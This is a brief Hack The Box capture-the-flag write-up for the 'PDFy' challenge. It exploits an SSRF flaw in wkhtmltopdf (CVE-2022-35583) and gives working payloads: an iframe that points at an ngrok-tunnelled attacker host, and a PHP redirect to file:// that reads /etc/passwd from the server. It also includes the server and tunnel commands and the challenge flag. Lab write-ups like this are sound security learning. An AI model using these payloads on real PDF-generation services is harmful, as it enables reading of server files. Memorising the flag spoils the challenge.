🗒️PDFy

https://app.hackthebox.com/challenges/PDFy

By intercepting the request we can changing the url we can see wkhtmltopdf is used to create pdfs

We can use this CVE to get the flag from /etc/passwd

[Security 9.8 CRITICAL] CVE-2022-35583 - wkhtmlTOpdf 0.12.6 is vulnerable to SSRF (Server-side request forgery) · Issue #5249 · wkhtmltopdf/wkhtmltopdfGitHub

index.html

<!DOCTYPE html>
<body>
    <iframe src="http://0.tcp.eu.ngrok.io:15500/flag.php?x=/etc/passwd" style="height:800px;width:100%"></iframe>
</body>
</html>

flag.php

<?php header('location:file://'.$_REQUEST['x']); ?>

First we are starting the php-server:

php -S 127.0.0.1:8000

We need an account ngrok and must enter a valid CC("We require a valid card as a way to combat abuse and keep the internet a safe place")

ngrok tcp 127.0.0.1:8000

We are coyping the tcp and change the protocol to http. Entering both in our pdy-file and send it to the server.

HTB{pdF_g3n3r4t1on_g03s_brrr!}

Last updated 1 year ago